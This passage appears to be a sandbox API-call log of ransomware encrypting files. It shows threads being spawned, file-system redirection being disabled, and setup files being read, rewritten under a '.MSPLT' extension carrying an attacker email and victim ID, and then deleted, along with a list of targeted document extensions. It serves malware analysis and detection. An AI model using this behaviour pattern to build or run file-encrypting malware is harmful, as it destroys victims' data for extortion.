hHeap=0x710000) returned 1 [0186.280] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 [0186.461] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 [0186.500] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 [0186.575] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 [0186.629] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f882b8 | out: hHeap=0x710000) returned 1 Thread: id = 13 os_tid = 0x12a0 [0164.828] GetTickCount () returned 0x1169f54 [0164.829] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x24) returned 0x76f508 [0164.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x76f508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0164.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x76f508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0164.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x76f508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ac [0164.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x76f508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0 [0164.832] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad50 [0164.832] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad50, Size=0x20) returned 0x74e8e0 [0164.832] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad50 [0164.832] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad50, Size=0x20) returned 0x74e908 [0164.833] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0164.833] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0164.833] Wow64DisableWow64FsRedirection (in: OldValue=0x2eaff7c | out: OldValue=0x2eaff7c*=0x0) returned 1 [0164.833] lstrlenW (lpString="kernel32.dll") returned 12 [0164.833] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0164.833] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0164.833] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e908 | out: hHeap=0x710000) returned 1 [0164.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x77af58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0164.834] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0166.915] GetTickCount () returned 0x116a773 [0166.915] GetTickCount () returned 0x116a773 [0166.915] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0167.327] GetTickCount () returned 0x116a918 [0167.327] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0167.652] GetTickCount () returned 0x116aa61 [0167.652] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0168.856] GetTickCount () returned 0x116af14 [0168.857] GetTickCount () returned 0x116af14 [0168.857] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0169.159] GetTickCount () returned 0x116b03d [0169.159] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0169.745] GetTickCount () returned 0x116b28e [0169.745] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0170.247] GetTickCount () returned 0x116b482 [0170.247] GetTickCount () returned 0x116b482 [0170.247] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0170.988] GetTickCount () returned 0x116b761 [0170.988] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0171.131] GetTickCount () returned 0x116b7ed [0171.131] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0171.363] GetTickCount () returned 0x116b8d8 [0171.364] GetTickCount () returned 0x116b8d8 [0171.364] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0171.701] GetTickCount () returned 0x116ba2f [0171.701] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0172.732] GetTickCount () returned 0x116be37 [0172.732] GetTickCount () returned 0x116be37 [0172.732] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0173.085] GetTickCount () returned 0x116bf8e [0173.085] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0173.335] GetTickCount () returned 0x116c088 [0173.335] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0173.597] GetTickCount () returned 0x116c192 [0173.597] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0173.702] GetTickCount () returned 0x116c1ff [0173.702] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0173.834] GetTickCount () returned 0x116c27c [0173.834] GetTickCount () returned 0x116c27c [0173.834] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0174.395] GetTickCount () returned 0x116c4af [0174.396] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0174.927] GetTickCount () returned 0x116c6c2 [0174.927] GetTickCount () returned 0x116c6c2 [0174.927] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0175.424] GetTickCount () returned 0x116c8b6 [0175.424] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0175.876] GetTickCount () returned 0x116ca7b [0175.876] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0176.401] GetTickCount () returned 0x116cc7f [0176.401] GetTickCount () returned 0x116cc7f [0176.401] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0176.816] GetTickCount () returned 0x116ce25 [0176.816] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0177.407] GetTickCount () returned 0x116d077 [0177.407] GetTickCount () returned 0x116d077 [0177.407] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0179.502] GetTickCount () returned 0x116d8a4 [0179.502] GetTickCount () returned 0x116d8a4 [0179.502] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0179.748] GetTickCount () returned 0x116d99e [0179.748] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.300] GetTickCount () returned 0x116dbc1 [0180.300] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.426] GetTickCount () returned 0x116dc3e [0180.426] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.552] GetTickCount () returned 0x116dcbb [0180.552] GetTickCount () returned 0x116dcbb [0180.552] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.666] GetTickCount () returned 0x116dd29 [0180.666] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.829] GetTickCount () returned 0x116ddd4 [0180.829] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0180.958] GetTickCount () returned 0x116de51 [0180.958] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0181.105] GetTickCount () returned 0x116dede [0181.105] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0181.221] GetTickCount () returned 0x116df5b [0181.221] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0181.361] GetTickCount () returned 0x116dfe8 [0181.361] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0182.276] GetTickCount () returned 0x116e372 [0182.276] GetTickCount () returned 0x116e372 [0182.276] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0183.044] GetTickCount () returned 0x116e67f [0183.044] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0183.806] GetTickCount () returned 0x116e97d [0183.806] GetTickCount () returned 0x116e97d [0183.806] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0184.304] GetTickCount () returned 0x116eb71 [0184.305] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0185.301] GetTickCount () returned 0x116ef49 [0185.301] GetTickCount () returned 0x116ef49 [0185.301] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0185.794] GetTickCount () returned 0x116f13d [0185.794] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0186.504] GetTickCount () returned 0x116f3fc [0186.504] GetTickCount () returned 0x116f3fc [0186.504] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0186.747] GetTickCount () returned 0x116f4f6 [0186.747] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0186.880] GetTickCount () returned 0x116f573 [0186.880] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) returned 0x102 [0187.025] GetTickCount () returned 0x116f610 [0187.025] WaitForSingleObject (hHandle=0x2b4, dwMilliseconds=0x64) Thread: id = 17 os_tid = 0xd68 [0167.256] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3241238 [0167.257] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3251240 [0167.257] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af90 [0167.257] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d100 [0167.258] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76afc0 [0167.258] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x3a3c020 [0167.261] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af78 [0167.261] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af78, Size=0x20) returned 0x74e930 [0167.261] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76aff0 [0167.261] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76aff0, Size=0x20) returned 0x74e958 [0167.262] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0167.262] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0167.262] Wow64DisableWow64FsRedirection (in: OldValue=0x341ff50 | out: OldValue=0x341ff50*=0x0) returned 1 [0167.262] lstrlenW (lpString="kernel32.dll") returned 12 [0167.262] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e930 | out: hHeap=0x710000) returned 1 [0167.262] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0167.262] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e958 | out: hHeap=0x710000) returned 1 [0167.262] Sleep (dwMilliseconds=0x64) [0167.653] lstrcmpiW (lpString1=".cmd", lpString2=".MSPLT") returned -1 [0167.653] lstrlenW (lpString="SetupComplete.cmd") returned 17 [0167.653] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0168.602] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=307) returned 1 [0168.602] CloseHandle (hObject=0x2f4) returned 1 [0168.602] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 0x20 [0168.622] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.622] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0168.623] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.623] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.623] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0168.623] GetLastError () returned 0x0 [0168.623] ReadFile (in: hFile=0x2f4, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x133, lpOverlapped=0x0) returned 1 [0168.641] WriteFile (in: hFile=0x2f8, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x140, lpOverlapped=0x0) returned 1 [0168.642] ReadFile (in: hFile=0x2f4, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0168.642] WriteFile (in: hFile=0x2f8, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.643] SetEndOfFile (hFile=0x2f8) returned 1 [0168.644] CloseHandle (hObject=0x2f8) returned 1 [0168.648] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.648] SetEndOfFile (hFile=0x2f4) returned 1 [0168.649] CloseHandle (hObject=0x2f4) returned 1 [0168.649] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0168.650] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 1 [0168.650] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.650] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.650] lstrlenW (lpString=".doc") returned 4 [0168.650] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0168.650] lstrlenW (lpString=".docx") returned 5 [0168.650] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0168.651] lstrlenW (lpString=".pdf") returned 4 [0168.651] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString=".xls") returned 4 [0168.651] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString=".xlsx") returned 5 [0168.651] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0168.651] lstrlenW (lpString=".ppt") returned 4 [0168.651] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.651] lstrlenW (lpString=".zip") returned 4 [0168.651] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString=".rar") returned 4 [0168.651] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString=".bz2") returned 4 [0168.651] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0168.651] lstrlenW (lpString=".7z") returned 3 [0168.651] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0168.651] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.651] lstrlenW (lpString=".dbf") returned 4 [0168.651] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0168.651] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.651] lstrlenW (lpString=".1cd") returned 4 [0168.651] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0168.651] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.651] lstrlenW (lpString=".jpg") returned 4 [0168.651] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.652] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.652] lstrlenW (lpString=".doc") returned 4 [0168.652] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString=".docx") returned 5 [0168.652] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0168.652] lstrlenW (lpString=".pdf") returned 4 [0168.652] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString=".xls") returned 4 [0168.652] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString=".xlsx") returned 5 [0168.652] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0168.652] lstrlenW (lpString=".ppt") returned 4 [0168.652] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.652] lstrlenW (lpString=".zip") returned 4 [0168.652] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString=".rar") returned 4 [0168.652] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString=".bz2") returned 4 [0168.652] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0168.652] lstrlenW (lpString=".7z") returned 3 [0168.652] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0168.652] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.652] lstrlenW (lpString=".dbf") returned 4 [0168.652] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0168.652] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.653] lstrlenW (lpString=".1cd") returned 4 [0168.653] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0168.653] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 39 [0168.653] lstrlenW (lpString=".jpg") returned 4 [0168.653] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0168.653] Sleep (dwMilliseconds=0x64) [0169.072] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.072] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.072] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.073] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=14168) returned 1 [0169.073] CloseHandle (hObject=0x2f8) returned 1 [0169.073] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 0x80 [0169.073] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.074] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.074] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.074] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.074] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.074] GetLastError () returned 0x0 [0169.074] ReadFile (in: hFile=0x2f8, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x3758, lpOverlapped=0x0) returned 1 [0169.085] WriteFile (in: hFile=0x300, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x3760, lpOverlapped=0x0) returned 1 [0169.087] ReadFile (in: hFile=0x2f8, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.087] WriteFile (in: hFile=0x300, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0169.087] SetEndOfFile (hFile=0x300) returned 1 [0169.087] CloseHandle (hObject=0x300) returned 1 [0169.089] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.089] SetEndOfFile (hFile=0x2f8) returned 1 [0169.091] CloseHandle (hObject=0x2f8) returned 1 [0169.091] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.091] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 1 [0169.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.092] lstrlenW (lpString=".doc") returned 4 [0169.092] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString=".docx") returned 5 [0169.092] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.092] lstrlenW (lpString=".pdf") returned 4 [0169.092] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString=".xls") returned 4 [0169.092] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString=".xlsx") returned 5 [0169.092] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.092] lstrlenW (lpString=".ppt") returned 4 [0169.092] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.092] lstrlenW (lpString=".zip") returned 4 [0169.092] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString=".rar") returned 4 [0169.092] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.092] lstrlenW (lpString=".bz2") returned 4 [0169.092] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.092] lstrlenW (lpString=".7z") returned 3 [0169.092] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.092] lstrlenW (lpString=".dbf") returned 4 [0169.092] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.092] lstrlenW (lpString=".1cd") returned 4 [0169.092] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.093] lstrlenW (lpString=".jpg") returned 4 [0169.093] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.093] lstrlenW (lpString=".doc") returned 4 [0169.093] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString=".docx") returned 5 [0169.093] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.093] lstrlenW (lpString=".pdf") returned 4 [0169.093] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString=".xls") returned 4 [0169.093] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString=".xlsx") returned 5 [0169.093] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.093] lstrlenW (lpString=".ppt") returned 4 [0169.093] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.093] lstrlenW (lpString=".zip") returned 4 [0169.093] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString=".rar") returned 4 [0169.093] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.093] lstrlenW (lpString=".bz2") returned 4 [0169.093] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.093] lstrlenW (lpString=".7z") returned 3 [0169.093] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.093] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.093] lstrlenW (lpString=".dbf") returned 4 [0169.094] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.094] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0169.094] lstrlenW 